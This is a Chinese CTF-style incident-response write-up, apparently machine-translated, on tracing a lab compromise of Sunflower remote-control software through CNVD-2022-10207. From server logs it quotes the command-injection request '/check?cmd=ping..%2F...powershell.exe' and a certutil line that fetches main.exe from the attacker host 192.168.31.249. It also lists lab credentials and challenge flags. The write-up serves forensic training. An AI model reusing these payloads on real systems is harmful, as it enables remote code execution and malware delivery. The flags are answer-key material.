一、前言
标题链接:第四章 windows实战-向日葵
三连私信免费送玄机注册约请码私信!!!看见就回!!注意私信!!
简单介绍一下向日葵;
向日葵长途连接软件是一款专为长途控制、长途管理和长途协助而计划的工具,适用于个人用户和企业用户。
功能特点
- 长途桌面控制:
- 答应用户通过网络长途控制另一台盘算机的桌面,就像操作本地盘算机一样。
- 支持多屏表现、屏幕录像、键盘鼠标控制等功能。
- 长途文件管理:
- 用户可以在长途盘算机之间传输文件,进行文件的上传、下载、删除、重定名等操作。
- 提供文件夹同步功能,实现两台设备之间的文件主动同步。
- 长途摄像头监控:
- 可以通过长途查看连接到长途盘算机的摄像头,实现长途监控功能。
- 支持实时视频传输,查看监控画面。
- 长途开关机:
- 支持通过网络长途启动或关闭盘算机,方便进行长途管理。
- 可以设定定时开关机任务,实现主动化管理。
- 长途协助:
- 用户可以通过向日葵软件向他人提供长途技能支持和帮助。
- 支持多人协作,共享屏幕,进行在线集会和培训。
- 跨平台支持:
- 向日葵支持多种操作体系,包罗Windows、macOS、Linux、Android和iOS。
- 用户可以通过不同设备进行长途连接和管理。
CNVD-2022-10207:向日葵RCE
漏洞背景
CNVD-2022-10207 是一个被发现的安全漏洞,答应未经授权的攻击者长途实行任意下令。
漏洞成因
该漏洞的成因通常涉及以下几个方面:
- 输入验证缺陷:软件在处置惩罚用户输入时,未能正确验证和过滤特定的输入数据。
- 路径处置惩罚不当:软件在处置惩罚文件路径时,可能存在目次遍历漏洞,答应攻击者访问任意文件。
- 功能滥用:某些管理功能未受到充足的保护,可以被长途调用,实行敏感操作。
攻击过程
- 发送特制请求:攻击者构造特定的 HTTP 请求,利用软件的输入验证缺陷或路径处置惩罚不当。
- 长途实行下令:通过特制请求,攻击者可以实行任意体系下令或脚本。
- 获取权限:成功利用漏洞后,攻击者可能获得体系的控制权,实行进一步的恶意操作。
影响
- 长途下令实行:攻击者可以在目的体系上实行任意下令,导致体系被完全控制。
- 数据泄漏:攻击者可以访问和窃取体系中的敏感数据。
- 进一步渗透:攻击者可以利用被控制的体系作为跳板,攻击网络内的其他设备。
具体实例
攻击者可能利用如下请求模式来触发漏洞:
目次遍历攻击:尝试访问和下载敏感文件。
- /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
- /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+whoami
简介
第四章 windows实战
Administrator xj@123456
标题;
1、通过本地 PC RDP到服务器并且找到黑客首次攻击成功的时间为 为多少,将黑客首次攻击成功的时间为 作为 FLAG 提交(2028-03-26 08:11:25.123);
2、通过本地 PC RDP到服务器并且找到黑客攻击的 IP 为多少,将黑客攻击 IP 作为 FLAG 提交;
3、通过本地 PC RDP到服务器并且找到黑客托管恶意程序 IP 为,将黑客托管恶意程序 IP 作为 FLAG 提交;
4、找到黑客解密 DEC 文件,将黑客DEC 文件的 md5 作为 FLAG 提交;
5、通过本地 PC RDP到服务器并且解密黑客勒索软件,将桌面加密文件中关键信息作为 FLAG 提交;
三、参考文章
玄机——第四章 windows实战-向日葵
四、步骤(剖析)
预备步骤#1.0
这里的靶机环境是windows,所以正常的我们利用长途桌面连接即可;
这里推荐各人利用“Microsoft“自带的长途桌面连接即可即可;(有一些笔记本/电脑是不自带的,不过已为各人预备好安装包)
123网盘下载;
https://www.123pan.com/s/q2J1jv-r8avd.html
提取码:0905
安装完成,进入主页,点击右上角“添加”–>“电脑”,接着启动靶机,输入靶机IP,点击“保存”,返回主页,点击连接,最后输入账号密码即可;
输入靶机IP,点击保存,返回主页;
输入账号密码,点击连接即可;
Administrator
xj@123456
最后连接成功;
步骤#1.1
通过本地 PC RDP到服务器并且找到黑客首次攻击成功的时间为 为多少,将黑客首次攻击成功的时间为 作为 FLAG 提交(2028-03-26 08:11:25.123);
解题思路
标题让我们提交黑客首次攻击成功的时间,那这题既然重要的是“向日葵”,而且桌面也有个“向日葵”,那肯定就是查日记分析了,那这里我们直接右键“向日葵”,接着打开文件位置就可以发现“log”目次,最后继续分析即可;
右键“打开文件所在位置”;
发现“log”目次,跟进分析;
那标题既然说是首次成功攻击,那肯定就从日记最早的时间查看分析起,如果这个日记没有发现,那就以此类推继续往下分析;
那打开日记,我们就重要分析以下特性,从而缩小范围进行查找;
特性
- 异常登录记载:
- 登录记载从未知或可疑IP地址。
- 非常规时间段内的登录行为。
- 频仍连接请求:
- 失败登录尝试:
- 新设备注册:
- 高频操作记载:
那就重要根据这几个特性分析呗,日记往下翻一点就发现了关键点;
简单分析一下这里;
这里的日记记载,可以看出确实是黑客的在进行攻击尝试。这些日记表现了多个HTTP连接尝试,每个连接尝试都有不同的路径和参数,这些路径和参数是漏洞利用或恶意扫描。
日记表现在同一时间段内,多个新连接尝试从同一IP地址(192.168.31.45)到目的IP地址(192.168.31.114),如下所示:
- 2024-03-21 19:54:56.229 - Info - [service][TcpAcceptor] new acceptor 192.168.31.45:58540-->192.168.31.114:49724
- 2024-03-21 19:54:56.244 - Info - [service][TcpAcceptor] new acceptor 192.168.31.45:58542-->192.168.31.114:49724
- 2024-03-21 19:54:56.244 - Info - [service][TcpAcceptor] new acceptor 192.168.31.45:58543-->192.168.31.114:49724
- 2024-03-21 19:54:56.245 - Info - [service][TcpAcceptor] new acceptor 192.168.31.45:58544-->192.168.31.114:49724
- /pages/createpage-entervariables.action?SpaceKey=x:
- 形貌:这个请求看起来像是针对某个网页应用框架的攻击尝试,可能是针对 Confluence 的下令注入。
- 参数:
- SpaceKey=x:攻击者尝试通过设置某个参数来利用该漏洞。
- 目的:通过设置不安全的参数值,可能会导致服务器实行恶意代码或下令。
- /CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/lib/password.properties%00en:
- 形貌:这是一个目次遍历攻击,它试图通过操纵路径来访问敏感文件。
- 参数:
- locale=../../../../../../../lib/password.properties%00en:攻击者利用了目次遍历 (../../../../../../../) 和空字符 (%00) 来访问本不应公开的 password.properties 文件。
- 目的:读取或修改设置文件,可能包含敏感信息如密码。
- /mailsms/s?func=ADMIN
&dumpConfig=/:
- 形貌:这个请求试图利用一个功能(可能是一个管理功能)来获取体系设置信息。
- 参数:
- func=ADMIN:appState&dumpConfig=/:这个参数组合看起来像是试图调用一个管理下令 (ADMIN:appState) 并将设置信息导出。
- 目的:获取体系设置和状态信息,可能包罗敏感数据。
三个URL分析下来发现是尝试在利用CNVD-2022-10207:向日葵长途控制软件 RCE 漏洞。
CNVD-2022-10207 漏洞是一种长途下令实行漏洞,存在于向日葵长途控制软件中。攻击者可以通过特制的 HTTP 请求利用此漏洞,实行任意下令或代码。
攻击过程
- 发送特制请求:攻击者发送精心构造的 HTTP 请求,利用应用程序中存在的漏洞。
- 实行恶意下令:服务器在处置惩罚这些请求时,由于存在输入验证缺陷或路径处置惩罚不当,导致实行攻击者注入的恶意下令。
- 获取权限:成功利用漏洞后,攻击者可以获得服务器上的长途控制权限,实行任意代码、修改数据或进一步渗透网络。
总结;
从这些日记记载中可以发现黑客利用了很多漏洞,这是一次次攻击尝试;
- 同一IP地址的多个连接尝试:
- 同一时间段内从192.168.31.45发起了多个连接,表现了显着的扫描或攻击行为。
- 可疑的HTTP路径和参数:
- 路径和参数表现了对体系特定资源的访问尝试,并且这些资源通常涉及漏洞利用(如路径遍历、设置文件读取等)。
所以开头这里的日记并没有发现黑客攻击成功,只是发现了黑客尝试利用各种漏洞进行攻击,那我们就继续往下分析,也是在日记的最底下发现了信息;
简单分析一下这里;
日记重要记载;
- 2024-03-26 10:16:25.570 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64246, path: /cgi-bin/rpc?action=verify-haras, version: HTTP/1.12024-03-26 10:16:25.570 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64246,/cgi-bin/rpc?action=verify-haras, plugin:cgi-bin, session:2024-03-26 10:16:25.585 - Info - [service][TcpAcceptor] new acceptor 192.168.31.45:64247-->192.168.31.114:497242024-03-26 10:16:25.585 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64247, path: /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+whoami
- , version: HTTP/1.12024-03-26 10:16:25.585 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64247,/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+whoami
- , plugin:check, session:dmPqDgSa8jOYgp1Iu1U7l1HbRTVJwZL32024-03-26 10:17:01.060 - Info - [service][TcpAcceptor] new acceptor 192.168.31.45:64284-->192.168.31.114:497242024-03-26 10:17:01.060 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64284, path: /cgi-bin/rpc?action=verify-haras, version: HTTP/1.12024-03-26 10:17:01.060 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64284,/cgi-bin/rpc?action=verify-haras, plugin:cgi-bin, session:2024-03-26 10:17:01.075 - Info - [service][TcpAcceptor] new acceptor 192.168.31.45:64285-->192.168.31.114:497242024-03-26 10:17:01.075 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64285, path: /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+pwd, version: HTTP/1.12024-03-26 10:17:01.075 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64285,/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+pwd, plugin:check, session:DTOAQFngEPZBDNNp5QLOYftzErN7RBCA2024-03-26 10:17:20.423 - Info - [localserver] Not use proxy
- 请求路径和下令:
- /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+whoami
- /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+pwd
这些路径和下令表明黑客正在尝试通过路径遍历攻击来访问并实行PowerShell下令,这些下令的目的是验证是否可以或许成功实行体系下令。whoami下令用于查看当前实行下令的用户,pwd下令用于查看当前工作目次。
- HTTP连接建立:
- 日记中多次记载了从攻击者IP(192.168.31.45)到目的IP(192.168.31.114)的HTTP连接,表明攻击者正在反复尝试连接和实行下令。
- 攻击成功的迹象:
- 虽然日记中没有表现下令的具体返回效果,但多次的连接请求和特定路径下令的利用表明攻击者在测试和确认下令实行的有效性。尤其是实行whoami和pwd下令,这通常是攻击者在初步获取访问权限后进行的操作,以确认他们的权限级别和工作目次。
总结;
日记记载表明,攻击者在2024年3月26日10:16:25通过路径遍历和下令注入成功实行了PowerShell下令。虽然没有具体的返回效果,但联合上下文,以下是关键点:
- 路径遍历攻击成功:攻击者通过路径遍历攻击成功访问并实行了体系下令。
- 权限确认:实行whoami和pwd下令表明攻击者正在确认其访问权限和工作目次,通常在获取成功的初步权限后进行。
标题让我们提交黑客首次攻击成功的具体时间,提交格式:flag{2028-03-26 08:11:25.123};
至此;
- flag{2024-03-26 10:16:25.585}
通过本地 PC RDP到服务器并且找到黑客攻击的 IP 为多少,将黑客攻击 IP 作为 FLAG 提交;
解题思路
标题让我们提交黑客攻击的IP,我觉得这题应该放第一小题,题一我们黑客首次成功时间都找到了,那就顺便看看日记记载的IP即可,这题没啥好说的;
得到;
清一色的IP,直接提交即可;
步骤#1.3
通过本地 PC RDP到服务器并且找到黑客托管恶意程序 IP 为,将黑客托管恶意程序 IP 作为 FLAG 提交;
解题思路
标题让我们提交黑客托管的恶意程序IP,那我们照旧继续在日记内里寻找一下特定的特性;
特性;
- 异常的外部连接:
- 查找日记中全部与外部IP的连接记载,尤其是那些与已知可信IP不同的连接。
- 不常见的端口号:
- 查抄利用不常见端口号的连接,由于黑客通常利用非标准端口来潜伏他们的活动。
- 频仍的重复连接:
- 关注短时间内频仍连接的IP地址,这可能表明尝试持续的攻击或数据传输。
- 可疑的请求路径:
- 分析日记格式:
- 确定日记中的外部连接记载格式,如连接源IP和目的IP的格式。
刚刚好,接着上题往下翻一点就发现了关键;
得到;
简单分析一下;
首先可以确认的是,这里的日记条目就表现了黑客从外部服务器下载并实行恶意程序的过程。
逐步分析;
1、新连接建立:
- 2024-03-26 10:31:07.538 - Info - [service][TcpAcceptor] new acceptor 192.168.31.45:49328-->192.168.31.114:49724
- 阐明:从IP 192.168.31.45 发起了到IP 192.168.31.114 的新连接。
- 端口号:源端口49328,目的端口49724。
2、HTTP连接建立:
- 2024-03-26 10:31:07.538 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:49328, path: /cgi-bin/rpc?action=verify-haras, version: HTTP/1.1
- 阐明:通过HTTP协议建立连接,访问路径为/cgi-bin/rpc?action=verify-haras。
- 插件:cgi-bin。
- 会话:无。
3、新连接建立:
- 2024-03-26 10:31:07.576 - Info - [service][TcpAcceptor] new acceptor 192.168.31.45:49329-->192.168.31.114:49724
- 阐明:从IP 192.168.31.45 发起了到IP 192.168.31.114 的另一新连接。
- 端口号:源端口49329,目的端口49724。
4、HTTP连接建立并实行下令:
- 2024-03-26 10:31:07.576 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:49329, path: /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+certutil+-urlcache+-split+-f+http%3A%2F%2F192.168.31.249%2Fmain.exe, version: HTTP/1.1
- 阐明:通过HTTP协议建立连接,并实行下令/check?cmd=ping....windows/system32/WindowsPowerShell/v1.0/powershell.exe certutil -urlcache -split -f http://192.168.31.249/main.exe。
- 插件:check。
- 会话:sobGzXzWBfSlSbdqnmkUbJMLEjhssRx1。
重要关键点;
- 恶意活动指示:
- 路径遍历:/check?cmd=ping.... 是一种路径遍历尝试,试图访问体系中的powershell.exe。
- 下令实行:利用 certutil 工具下载文件 main.exe。
- 外部IP:下载源 http://192.168.31.249/main.exe 指向一个可能托管恶意程序的外部服务器。
- 恶意程序下载:
- 工具利用:certutil 是一个正当的Windows工具,但在这里被用于下载恶意文件,这是一个常见的攻击模式。
- 下载目的:目的文件 main.exe 可能是恶意程序。
总结;
这些日记条目表现了黑客尝试利用路径遍历和下令注入漏洞,通过 certutil 从外部服务器(192.168.31.249)下载并实行恶意程序 main.exe。这表明黑客的攻击成功了,且试图在目的体系上下载并运行恶意软件。
标题让我们提交黑客托管恶意程序 IP;
至此;
步骤#1.4
找到黑客解密 DEC 文件,将黑客DEC 文件的 md5 作为 FLAG 提交;
解题思路
标题让我们提交黑客解密的DEC文件的MD5,那我们先在日记里尝试搜索一下文件名“DES”,看看有没有被定位到路径,但是发现没有这个文件,但是在差不多日记最底下发现了一个txt,谁人txt里的内容是一个QQ号,抱着尝试的心情加了一下,最后在该群的“群文件”中发现了“DES”;(过后发现这是该平台的官方QQ群“玄机”)
未查到到文件“DEC”;
在日记最底下发现了TXT记载;
搜索QQ号,发现玄机官方群聊;(647224830)
参加该群,在群文件中发现了标题所说的"DEC"文件,但是提交格式为MD5,所以下载该文件进行MD5加密;
这里把文件进行MD5加密方法不唯一,这里暂且举两个例子,也就我们常用的两种,liunx以及window;
window中文件进行MD5加密;
这里的“DEC”文件,注意输入具体路径(或者在同一目次下唤起PowerShell);
下令;
- certutil -hashfile .\DEC.pem MD5
Liunx中文件进行MD5加密;
下令;
得到;
至此;
- flag{5ad8d202f80202f6d31e077fc9b0fc6b}
通过本地 PC RDP到服务器并且解密黑客勒索软件,将桌面加密文件中关键信息作为 FLAG 提交;
解题思路
标题让我们解密桌面的文件将其中的flag进行提交,桌面确实有两个文件,我们简单分析一下;
两个文件;
右键记事本打开;
baoleiji.txt;
得到;
desktop.ini;
得到;
嘶,这两个文件让我想起了久违的老朋侪“RSA”,联合上题得到的“DEC.pem”,那就正常RSA解密呗;
DEC.pem;
随便找一个RSA在线解密即可;
RSA在线解密
解密得到:NXVJSTQUAPGTXKSX
接着进行AES解密,随便找一个在线的即可;
AES在线解密
解密得到flag,iv偏移量是16个0;
得到;
- @suanve
- 时间是连续的,年份只是人类虚构出来用于统计的单位,2024年第一天和2023年最后一天,
- 不会有任何本质区别。你的花呗,你的客户,你的体检报告,窗外的寒风,都不会因为这是新的一年,
- 而停下对你的毒打。
- GIVE YOU FLAG!!!!!
- flag{EDISEC_15c2e33e-b93f-452c-9523-bbb9e2090cd1}
- flag{EDISEC_15c2e33e-b93f-452c-9523-bbb9e2090cd1}
做兜做了,那还剩最后还有一个desktop.ini;(我们也解密一下吧)
解密得到:KBFKKYZKCBBUZKEC
AES解密;
最后;
-
- [.ShellClassInfo]
- LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21769
- IconResource=%SystemRoot%\system32\imageres.dll,-183
这个是 desktop.ini 的设置文件的内容。desktop.ini 文件用于自界说 Windows 文件夹的表现属性。这段内容重要用于更改文件夹的图标和名称表现。以下是详细分析:
- [.ShellClassInfo]:
- 这是一个节标识符,表明接下来的内容属于 .ShellClassInfo 节。
- LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21769:
- LocalizedResourceName:此参数用于指定文件夹的本地化名称。
- @%SystemRoot%\system32\shell32.dll,-21769:指定从 shell32.dll 文件中提取资源字符串。%SystemRoot% 是一个环境变量,通常指向 C:\Windows 目次。-21769 是资源 ID,指向 shell32.dll 中的一个字符串资源,用于定名文件夹。
- IconResource=%SystemRoot%\system32\imageres.dll,-183:
- IconResource:此参数用于指定文件夹的图标。
- %SystemRoot%\system32\imageres.dll,-183:指定从 imageres.dll 文件中提取图标资源。-183 是资源 ID,指向 imageres.dll 中的一个图标资源,用于更改文件夹的图标。
作用
- 文件夹名称:利用 shell32.dll 中的资源字符串来表现文件夹的本地化名称,这通常用于体系文件夹,以确保它们在不同语言的操作体系中表现正确的名称。
- 文件夹图标:利用 imageres.dll 中的资源图标来设置文件夹的图标,这通常用于体系文件夹或特定应用程序的文件夹,以提供统一和直观的图标表现。
示例
假设这个 desktop.ini 文件位于某个文件夹中,那么:
- 文件夹的表现名称将从 shell32.dll 中提取,表现为 -21769 资源 ID 对应的字符串(这可能是一个特定语言的名称)。
- 文件夹的图标将从 imageres.dll 中提取,表现为 -183 资源 ID 对应的图标。
总结
这段 desktop.ini 设置文件内容用于更改文件夹的表现名称和图标,提供更好的用户界面体验,尤其在体系和应用程序文件夹中常见。这些自界说设置通过引用体系 DLL 文件中的资源字符串和图标来实现。
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |
